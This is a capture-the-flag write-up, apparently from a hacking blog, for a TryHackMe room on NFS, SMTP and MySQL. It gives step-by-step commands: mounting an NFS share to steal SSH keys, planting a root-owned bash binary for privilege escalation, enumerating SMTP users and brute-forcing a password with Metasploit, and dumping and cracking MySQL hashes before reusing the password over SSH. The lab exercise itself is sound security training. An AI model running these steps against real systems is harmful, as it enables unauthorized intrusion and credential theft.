The Dutch Hacker
write up Network service 2 tryhackme

Network Services 2 – Tryhackme

This is the write up for the room Network Services 2 on Tryhackme

Here is the write up for the first Network Services Room

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Tasks for Network Services 2

Learn how to enumerate SMTP, MySQL and NFS.

Task 1:

Read all that is in the task and press complete

NFS

Task 2:

All answers are in the Text of the task. Except for the last question. That can be found in the wiki page

Answer task 2
Network Services 2
answer task 2

Task 3:

Deploy the attached VM and read all that is in the task

3.1 Open a terminal and type in the command nmap -T4 -A -p- <IP of VM>

Network Services 2
answer task 3

Now type in the command shomount -e <ip of vm>

Network Services 2
answer task 3

First, use “mkdir /tmp/mount” to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.

Network Services 2
answer task 3
Network Services 2
answer task 3

Now for the exploit. We did this also in an other room. copy all rsa files to you own .ssh directory read the public keys to get the username and then log in. Here we go

type cp id_rsa* ~/.ssh

navigate to your .shh keys by typing in cd ~/.ssh then type cat id_rsa.pub to get the username

Network Services 2

Now we are going to login by typing ssh cappucino@<ip of vm>

Network Services 2
answer task 3

Task 4:

First we are going to download the bash shell

download the file located here as stated in the task https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

The we are going to copy the bash by typing in cp bash /tmp/mount/cappucino now we are giving the root right to the file and copy it over to the share.

Network Services 2
answer task 4

now we log in again as cappucino ssh cappucino@<ip of vm> and run the bash

Network Services 2

now type cat /root/root.txt to get the answer of the last question

SMTP

Task 5:

Read all the text in the task. All questions can be found in this task

Answers task 5

Task 6:

Start the VM attached to this task. If you still have the VM open from previous task then please terminate this.

Before you begin reading type in the command nmap -T4 -p- <ip of vm> to start the port scan. As this will take a while.

Network Services 2
Network Services 2
answer task 6

The next question can not be found in the text. Just google metasploit and you will come across allot of article. But the start it just type msfconsole

answer task 6

In the msfconsole type in search smtp_version

Network Services 2
answer task 6

To select this type in use 0 then type in options to see the options

Network Services 2
answer task 6

Type in SET RHOSTS <ip of vm> and then type in RUN or EXPLOIT

Network Services 2
answer task 6

The answer of the next question can be found here Mail terminology: MTA, MUA, MSA, MDA, SMTP, DKIM, SPF, DMARC | Sysadmin (afreshcloud.com)

answer task 6

For the next question we type in search smtp_enum

Network Services 2
answer task 6

For the next question the seclist is located in kali here /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

Type in use 0 then options and then set the use_file to the right one.

set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

Network Services 2

Type Set RHOSTS <ip of vm> to set the correct target machine

answer task 6

Now type in RUN to answer the last question

Network Services 2
answer task 7

Task 7:

Read all that is in the task and type in the following command

Network Services 2

The password will show up. Now we can use that password to initiated an ssh connection to the server to get what is in smtp.txt

Network Services 2

MSQL

Task 8:

Read all that is in the task. All questions can be found in the text of the task except the last one. One google string with the hint given will give you the answer

answer task 8

Task 9:

Deploy the VM and the read all that is in the task.

Type in the command nmap -sC -sV <IP of VM>

Network Services 2
answer task 9

The credentials you need are in the text of the task. You can give it a go by typing in the command

mysql -h [IP] -u [username] -p

Launch Metasplout by typing in mfsconsole

Type search mysql_sql

Network Services 2
answer task 9

Type in the following commands in a row

  • SET PASSWORD <password found in text>
  • SET RHOSTS <ip of vm>
  • SET USERNAME <username found in text>
  • RUN
Network Services 2
answer task 9

Type in SET SQL Show databases and the RUN

Network Services 2
answer task 9

Task 10

With the msfconsole still open type in search mysql_schemadump

Network Services 2
answer task 10

Type in the following commands in a row

  • SET PASSWORD <password found in text>
  • SET RHOSTS <ip of vm>
  • SET USERNAME <username found in text>
  • RUN
Network Services 2
answer task 10

Now type in the following search mysql_hashdump

Network Services 2
answer task 10

Now we need to set the options

Type in the following commands in a row

  • SET PASSWORD <password found in text>
  • SET RHOSTS <ip of vm>
  • SET USERNAME <username found in text>
  • RUN
answer task 10

The copy and past the string from carl and put that into the answer of the next question.

Als creat a txt file called hash.txt and copy the found string into hash.txt. By command you would to something like echo carl:*HASH >> hash.txt ( replace HASH with the found hash)

Exit out of the mfsconsole or use another terminal then type john hash.txt

You will find the password that will complete you the next question

Now for the last question. We now know a username and a password. Users normally use the same password for everything. We saw that port 22 was also open. Now ssh into the machien by typing ssh carl@<IP of VM> and use the password we just found

Network Services 2

cat MySQL.txt and use the output for the last question

Conclusion room Network Services 2

We have learned that enumeration is the key. We learned about the following services and how this might be exploited NFS, SMTP ,MySQL

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us